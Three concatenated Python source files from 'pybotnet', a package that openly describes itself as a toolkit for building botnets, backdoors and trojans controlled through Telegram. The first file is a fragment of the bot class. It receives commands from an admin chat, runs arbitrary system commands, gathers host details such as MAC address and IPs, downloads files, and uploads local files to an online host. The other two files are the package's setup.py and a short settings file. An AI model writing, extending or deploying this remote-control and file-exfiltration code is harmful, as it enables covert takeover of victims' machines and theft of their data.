                self.send_message_by_third_party_proxy(
                    f'command received: \n{self.command}')

                self.output = scripts.execute_scripts(
                    self.command, self.pybotnet_up_time(),
                    self.ADMIN_CHAT_ID, self.TELEGRAM_TOKEN,
                    self.previous_update_id, self.logger)

                if self.output:
                    self.send_message_by_third_party_proxy(
                        f'output: \n{self.output}')
            else:
                self.logger.info('invalid command')
        else:
            self.logger.info('None command')

    def get_system_info(self) -> str:
        '''
        return system info: \n
        operating system ,mac addres ,global ip, \n
        country ,pybotnet up time ,local ip,\n
        Hostname ,current route ,pid, \n
        ...more
        '''
        return scripts.get_info(self.pybotnet_up_time(), self.logger)

    def run_command_in_system(self, command: str) -> str:
        '''run system command in console and return data'''
        return scripts.execute_cmd(command, self.logger)

    def run_ls(self, path: str) -> str:
        '''return list of directory or files'''
        return scripts.ls(path)

    def download_file(self, download_link: str, file_name: str = False):
        if not file_name:
            file_name = re.findall(r'.*/(.*)$', download_link)
            file_name = (file_name[0])

        return scripts.download_manager(download_link, file_name)

    def upload_file(self, file_route: str):
        '''upload file to a online host , return link and other data'''
        return scripts.upload_manager(file_route, self.logger)



import io
import os
import sys
from shutil import rmtree

from setuptools import find_packages, setup, Command

from pybotnet.settings import pybotnet_github_link, pybotnet_version

# setup to pypi.org :
# python setup.py sdist bdist_wheel
# twine upload  dist/*


# Package meta-data.
NAME = 'pybotnet'
DESCRIPTION = 'A Python module for building botnet ,backdoor or trojan with Telegram control panel'
URL = pybotnet_github_link
EMAIL = 'onionj98@gmail.com'
AUTHOR = 'onionj'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = pybotnet_version
KEYWORDS = ['onionj pybotnet', 'make python trojan',
            'make python backdoor', 'make python botnet',
            'pybotnet', 'python ddos', 'python backdoor',
            'python trojan']


# What packages are required for this module to be executed?
with open("requirements.txt") as f:
    dependencies = f.read().splitlines()


# What packages are optional?
EXTRAS = {
}

# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!

here = os.path.abspath(os.path.dirname(__file__))


try:
    with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
        long_description = '\n' + f.read()
except FileNotFoundError:
    long_description = DESCRIPTION

about = {}
about['__version__'] = VERSION


class UploadCommand(Command):
    """Support setup.py upload."""

    description = 'Build and publish the package.'
    user_options = []

    @staticmethod
    def status(s):
        """Prints things in bold."""
        print('\033[1m{0}\033[0m'.format(s))

    def initialize_options(self):
        pass

    def finalize_options(self):
        pass

    def run(self):
        try:
            self.status('Removing previous builds…')
            rmtree(os.path.join(here, 'dist'))
        except OSError:
            pass

        self.status('Building Source and Wheel (universal) distribution…')
        os.system(
            '{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))

        self.status('Uploading the package to PyPI via Twine…')
        os.system('twine upload dist/*')

        self.status('Pushing git tags…')
        os.system('git tag v{0}'.format(about['__version__']))
        os.system('git push --tags')

        sys.exit()


# Where the magic happens:
setup(
    name=NAME,
    version=about['__version__'],
    description=DESCRIPTION,
    long_description=long_description,
    long_description_content_type='text/markdown',
    author=AUTHOR,
    author_email=EMAIL,
    python_requires=REQUIRES_PYTHON,
    url=URL,
    packages=find_packages(),
    # If your package is a single module, use this instead of 'packages':
    # py_modules=['mypackage'],

    # entry_points={
    #     'console_scripts': ['mycli=mymodule:cli'],
    # },
    install_requires=dependencies,
    extras_require=EXTRAS,
    include_package_data=True,
    license='gpl-3.0',
    keywords=KEYWORDS,
    classifiers=[

        # Again, pick a license
        'License :: OSI Approved :: GNU Lesser General Public License v3 or later (LGPLv3+)',
        # Specify which pyhton versions that you want to support
        'Programming Language :: Python :: 3.6',
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
    ],
    # $ setup.py publish support.
    cmdclass={
        'upload': UploadCommand,
    },
)




pybotnet_version = '1.0.0'
pybotnet_github_link = 'https://github.com/onionj/pybotnet'
pybotnet_license = 'GNU Lesser General Public License v3 or later (LGPLv3+)'
pybotnet_pypi_link = 'https://pypi.org/project/pybotnet/'


pybotnet_info = f"""
            ************ PyBotNet ************
version:       {pybotnet_version}         
licence:       {pybotnet_license}                        
github link:   {pybotnet_github_link}
pypi link:     {pybotnet_pypi_link}

            ************           ************
"""
